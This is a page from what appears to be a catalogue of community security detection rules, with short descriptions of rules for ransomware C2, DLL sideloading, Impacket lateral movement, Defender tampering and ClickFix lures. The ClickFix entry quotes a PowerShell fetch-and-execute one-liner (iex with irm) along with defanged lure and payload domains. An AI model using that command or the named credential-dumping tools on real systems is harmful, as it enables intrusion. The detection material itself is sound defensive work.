Detections
Explore public detection logic contributed by the community across SIEM and rule languages.
39,169 detections
Filters
Last updated
All Time
Detection languages
14,931
13,545
2,503
1,803
1,719
Contributors
7,678
6,007
5,306
4,504
3,957
Categories
17,726
9,432
3,736
3,663
3,653
Platforms
39,169
6,860
6,378
3,772
3,516
Products / Services
10,104
9,405
6,482
1,853
1,706
MITRE Techniques
13,640
12,926
7,897
5,843
4,354
CVEs
50
45
30
30
29
IDS Classtypes
210
56
36
24
19
IDS Protocols
177
171
20
17
4
This rule monitors for suspicious command-line activity involving the Fortis payment processor's webhook log files. It detects when attackers use tools like 'findstr', 'cmd', or 'dir' to navigate directories containing webhook data and specifically searches for payment card fields such as CVV, primary account numbers, and expiration dates, which is a common indicator of post-compromise data exfiltration.
Detects DLL sideloading activity associated with the 'Lorem Ipsum Loader' malware. The rule monitors for specific combinations of legitimate Windows binaries loading specific DLLs from non-system directories, a common technique to execute malicious code via trusted processes.
This rule detects HTTP requests where the User-Agent header indicates a PowerShell execution occurring from a system configured with the zh-CN locale. This pattern is often associated with automated scripts or potential malicious activity masquerading as legitimate PowerShell traffic.
Detection of common web server reconnaissance, enumeration, and brute-force patterns targeting IIS environments. This includes detection of short-name (~1) probes, WebDAV method usage, NTFS alternate data stream requests, and brute-force attempts on login endpoints originating from PowerShell user agents.
Detects the presence of an embedded word-to-hex lookup table within a PE file. This technique is used by the Lorem Ipsum Loader to store shellcode as plaintext English words to evade entropy-based detection and static analysis tools. The rule matches a dense sequence of lowercase words frequently found in these malicious loaders.
The following analytic detects creation and removal of intermediary remediation artifacts of Windows Defender, during exploitation of ShieldCrash attacks.
Exploit abuses the race condition between file validation and its remediation performed by Windows Defender. In between these steps, ShieldCrash changes the
symbolic link to redirect the remediation process to a staging directory controlled by the attacker. This detection aims to detect creation of defender artifact,
its alternate data stream, and their subsequent removal.
Exploit abuses the race condition between file validation and its remediation performed by Windows Defender. In between these steps, ShieldCrash changes the
symbolic link to redirect the remediation process to a staging directory controlled by the attacker. This detection aims to detect creation of defender artifact,
its alternate data stream, and their subsequent removal.
This rule correlates multiple telemetry sources (File Events, Certificate Info, Network Events, and DNS Events) to detect known malicious indicators, including specific file hashes, IP addresses, domains, and URLs associated with malicious activity.
This rule correlates multiple telemetry sources (File Events, Certificate Info, Network Events, and DNS Events) to detect known malicious indicators, including specific file hashes, IP addresses, domains, and URLs associated with malicious activity.
This rule monitors for execution of files with specific SHA256 hashes known to be malicious, and network connections to a known malicious domain associated with Vultr storage. It aggregates file creation, process execution, and network connection events to detect potential threat activity.
This rule detects potential malicious activity by matching file hashes against a known list of malicious indicators and monitoring for suspicious network connections. The network monitoring includes connections to hardcoded malicious IP addresses, specific C2 URLs, and DNS queries for known fallback domains used in malicious infrastructure when the initiating process is not a recognized web browser or wallet application.
This rule detects potential malicious activity by matching file hashes against a known list of malicious indicators and monitoring for suspicious network connections. The network monitoring includes connections to hardcoded malicious IP addresses, specific C2 URLs, and DNS queries for known fallback domains used in malicious infrastructure when the initiating process is not a recognized web browser or wallet application.
Detects post-exploitation indicators of CVE-2026-62911, an authentication-bypass-by-capture-replay vulnerability in Microsoft Exchange. The rule identifies anomalous behavior following a potential bypass: either the assignment of the ApplicationImpersonation management role or a single impersonation session accessing an abnormally high number of distinct mailboxes (FolderBind, MessageBind, or SendAs).
Detects the execution of a Node.js interpreter (node.exe or node) as a child process of a Fortinet management-related process, or where the command line contains references to Fortinet. This behavior is indicative of post-exploitation activity related to CVE-2025-25249, where a heap-based buffer overflow is exploited to deploy the PivotC2 remote access trojan.
Detects network connections, process command line arguments, and DNS queries associated with identified Galago or Panzer ransomware C2, leak site, or contact infrastructure (Tox IDs/Tor .onion addresses).
This rule monitors for known malicious indicators, including a specific file hash, a C2 IP address, a remote URL associated with potential malicious activity (anydesk.exe), and a domain associated with C3Pool crypto-mining activity, across device processes, network events, and file operations.
This rule monitors for indicators of compromise (IOCs) associated with the Rapuncel/Cruciferra 'Bring Your Own Vulnerable Driver' (BYOVD) malware-as-a-service (MaaS) campaign. It detects malicious file hashes (associated with dropped binaries or drivers), connections to known malicious command-and-control (C2) IP addresses, and network requests to domains used by the infrastructure.
This rule monitors for coordinated persistence efforts by detecting the occurrence of at least two out of three specific persistence techniques (registry run key modification, scheduled task creation, or WMI-based script execution) on the same device within a 30-minute window. It explicitly filters out activities from signed binaries or those occurring in standard system/application directories, focusing on potentially malicious artifacts originating from user-writable locations.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
Detects the ClickFix social-engineering technique from the third-party.com report: a fake CAPTCHA/Cloudflare page tricks a user into pressing Win+R, pasting a clipboard-poisoned command, and hitting Enter, launching PowerShell (spawned by explorer.exe, the Run dialog's parent) that chains Invoke-RestMethod (irm) into Invoke-Expression (iex) to fetch and execute a remote payload in memory, e.g. powershell "Write-Host(&{iex(irm('<url>'))})2>$null". Reference IOCs from the report: lure domain third-party[.]com, second-stage payload elxxvvx[.]xyz/f.
This rule detects the execution of known lateral movement tools, including Impacket suite components and NetExec (formerly CrackMapExec), by monitoring process command lines. It specifically flags tools such as psexec.py, wmiexec.py, and secretsdump.py, which are frequently used for remote execution and credential dumping. The rule also joins these process events with network events targeting SMB port 445 to correlate tool usage with potential lateral movement activity.
Detects attempts to disable or tamper with Microsoft Windows Defender via registry modifications or malicious PowerShell/reg.exe commands, specifically targeting security settings like DisableAntiSpyware, DisableRealtimeMonitoring, and exclusion paths.
Page 59 of 1866


